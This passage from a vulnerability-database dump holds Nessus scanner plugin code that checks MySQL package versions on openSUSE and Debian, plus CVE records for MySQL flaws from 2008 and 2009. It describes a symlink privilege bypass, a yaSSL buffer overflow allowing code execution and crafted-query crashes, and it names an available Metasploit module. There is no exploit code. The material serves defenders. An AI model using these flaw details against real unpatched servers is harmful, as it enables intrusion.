value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient-devel-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient16-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient_r16-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqld-devel-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-bench-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-client-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-debug-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-extra-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-management-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-storage-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-tools-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-test-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-tools-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient16-32bit-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r16-32bit-5.1.36-6.8.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient16 / libmysqlclient16-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:53:46", "description": "The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.41 and is, therefore, potentially affected by the following\nvulnerabilities :\n\n - An incomplete fix was provided in 5.1.24 for\n CVE-2008-2079, a symlink-related privilege\n escalation issue. (Bug #39277)\n\n - MySQL clients linked against OpenSSL are vulnerable\n to man-in-the-middle attacks. (Bug #47320)\n\n - The GeomFromWKB() function can be manipulated\n to cause a denial of service. (Bug #47780)\n\n - Specially crafted SELECT statements containing sub-\n queries in the WHERE clause can cause the server\n to crash. (Bug #48291)", "edition": 26, "published": "2009-11-25T00:00:00", "title": "MySQL 5.1 < 5.1.41 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-2079", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_5_1_41.NASL", "href": "https://www.tenable.com/plugins/nessus/42900", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42900);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\n \"CVE-2008-2079\",\n \"CVE-2008-7247\",\n \"CVE-2009-4019\",\n \"CVE-2009-4028\",\n \"CVE-2009-4030\"\n );\n script_bugtraq_id(37075, 37076, 37297, 38043);\n script_xref(name:\"Secunia\", value:\"37372\");\n\n script_name(english:\"MySQL 5.1 < 5.1.41 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL 5.1 Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.41 and is, therefore, potentially affected by the following\nvulnerabilities :\n\n - An incomplete fix was provided in 5.1.24 for\n CVE-2008-2079, a symlink-related privilege\n escalation issue. (Bug #39277)\n\n - MySQL clients linked against OpenSSL are vulnerable\n to man-in-the-middle attacks. (Bug #47320)\n\n - The GeomFromWKB() function can be manipulated\n to cause a denial of service. (Bug #47780)\n\n - Specially crafted SELECT statements containing sub-\n queries in the WHERE clause can cause the server\n to crash. (Bug #48291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=39277\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=47320\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=47780\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.mysql.com/bug.php?id=48291\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=oss-security&m=125908080222685&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=oss-security&m=125908040022018&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.mysql.com/bug.php?id=32167\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL 5.1.41 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 59, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\nvuln = FALSE;\n\nif (mysql_init(port:port, exit_on_fail:TRUE) == 1)\n{\n variant = mysql_get_variant();\n version = mysql_get_version();\n ver_fields = split(version, sep:'.', keep:FALSE);\n major = int(ver_fields[0]);\n minor = int(ver_fields[1]);\n rev = int(ver_fields[2]);\n\n if (\n !isnull(variant) && \"Community\" >< variant &&\n strlen(version) &&\n major == 5 && minor == 1 && rev < 41\n )\n {\n vuln = TRUE;\n }\n}\nelse exit(1, \"Can't establish a MySQL connection on port \"+port+\".\");\n\nmysql_close();\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\nInstalled version : ' + version + '\nFixed version : 5.1.41\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse\n{\n if (isnull(variant)) exit(1, \"Can't determine the variant of MySQL listening on port \"+port+\".\");\n else if (\"Community\" >< variant) exit(0, \"MySQL version \"+version+\" is listening on port \"+port+\" and is not affected.\");\n else exit(0, \"MySQL \"+variant+\" is listening on port \"+port+\" and is not affected.\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T09:45:51", "description": "Several vulnerabilities have been discovered in the MySQL database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2009-4019\n Domas Mituzas discovered that mysqld does not properly\n handle errors during execution of certain SELECT\n statements with subqueries, and does not preserve\n certain null_value flags during execution of statements\n that use the GeomFromWKB function, which allows remote\n authenticated users to cause a denial of service (daemon\n crash) via a crafted statement.\n\n - CVE-2009-4030\n Sergei Golubchik discovered that MySQL allows local\n users to bypass certain privilege checks by calling\n CREATE TABLE on a MyISAM table with modified DATA\n DIRECTORY or INDEX DIRECTORY arguments that are\n originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at\n which a pathname is modified to contain a symlink to a\n subdirectory of the MySQL data home directory.\n\n - CVE-2009-4484\n Multiple stack-based buffer overflows in the\n CertDecoder::GetName function in src/asn.cpp in TaoCrypt\n in yaSSL before 1.9.9, as used in mysqld, allow remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and daemon crash) by\n establishing an SSL connection and sending an X.509\n client certificate with a crafted name field.", "edition": 27, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1997-1 : mysql-dfsg-5.0 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:mysql-dfsg-5.0"], "id": "DEBIAN_DSA-1997.NASL", "href": "https://www.tenable.com/plugins/nessus/44861", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1997. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44861);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4030\", \"CVE-2009-4484\");\n script_bugtraq_id(37075, 37640, 37943);\n script_xref(name:\"DSA\", value:\"1997\");\n\n script_name(english:\"Debian DSA-1997-1 : mysql-dfsg-5.0 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the MySQL database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2009-4019\n Domas Mituzas discovered that mysqld does not properly\n handle errors during execution of certain SELECT\n statements with subqueries, and does not preserve\n certain null_value flags during execution of statements\n that use the GeomFromWKB function, which allows remote\n authenticated users to cause a denial of service (daemon\n crash) via a crafted statement.\n\n - CVE-2009-4030\n Sergei Golubchik discovered that MySQL allows local\n users to bypass certain privilege checks by calling\n CREATE TABLE on a MyISAM table with modified DATA\n DIRECTORY or INDEX DIRECTORY arguments that are\n originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at\n which a pathname is modified to contain a symlink to a\n subdirectory of the MySQL data home directory.\n\n - CVE-2009-4484\n Multiple stack-based buffer overflows in the\n CertDecoder::GetName function in src/asn.cpp in TaoCrypt\n in yaSSL before 1.9.9, as used in mysqld, allow remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and daemon crash) by\n establishing an SSL connection and sending an X.509\n client certificate with a crafted name field.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4030\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4484\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-1997\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mysql-dfsg-5.0 packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 5.0.32-7etch12\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.0.51a-24+lenny3\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MySQL yaSSL CertDecoder::GetName Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg-5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"libmysqlclient15-dev\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libmysqlclient15off\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-client\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-client-5.0\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-common\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-server\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-server-4.1\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mysql-server-5.0\", reference:\"5.0.32-7etch12\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libmysqlclient15-dev\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libmysqlclient15off\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"mysql-client\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"mysql-client-5.0\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"mysql-common\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"mysql-server\", reference:\"5.0.51a-24+lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"mysql-server-5.0\", reference:\"5.0.51a-24+lenny3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T11:51:06", "description": "sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.", "edition": 4, "cvss3": {}, "published": "2009-11-30T17:30:00", "title": "CVE-2008-7247", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7247"], "modified": "2019-12-17T20:26:00", "cpe": ["cpe:/a:oracle:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:6.0.4", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:oracle:mysql:5.0.81", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.38", "cpe:/a:oracle:mysql:5.0.51", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:5.0.19", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:oracle:mysql:6.0.2", "cpe:/a:oracle:mysql:5.0.23", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:oracle:mysql:6.0.1", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:oracle:mysql:5.0.21", "cpe:/a:oracle:mysql:5.0.33", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:oracle:mysql:5.0.26", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.0.52", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:5.0.45", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:oracle:mysql:5.0.83", "cpe:/a:oracle:mysql:5.0.41", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:5.0.75", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:oracle:mysql:5.0.25", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:6.0.3", "cpe:/a:oracle:mysql:5.0.77", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:6.0.0", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:6.0.9", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:5.0.37", "cpe:/a:oracle:mysql:5.1.7", "cpe:/a:oracle:mysql:5.0.50", "cpe:/a:oracle:mysql:5.0.42", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:5.0.22", "cpe:/a:mysql:mysql:5.0.17"], "id": "CVE-2008-7247", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7247", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.81:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.30:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.22.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.77:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.75:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:6.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.83:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", 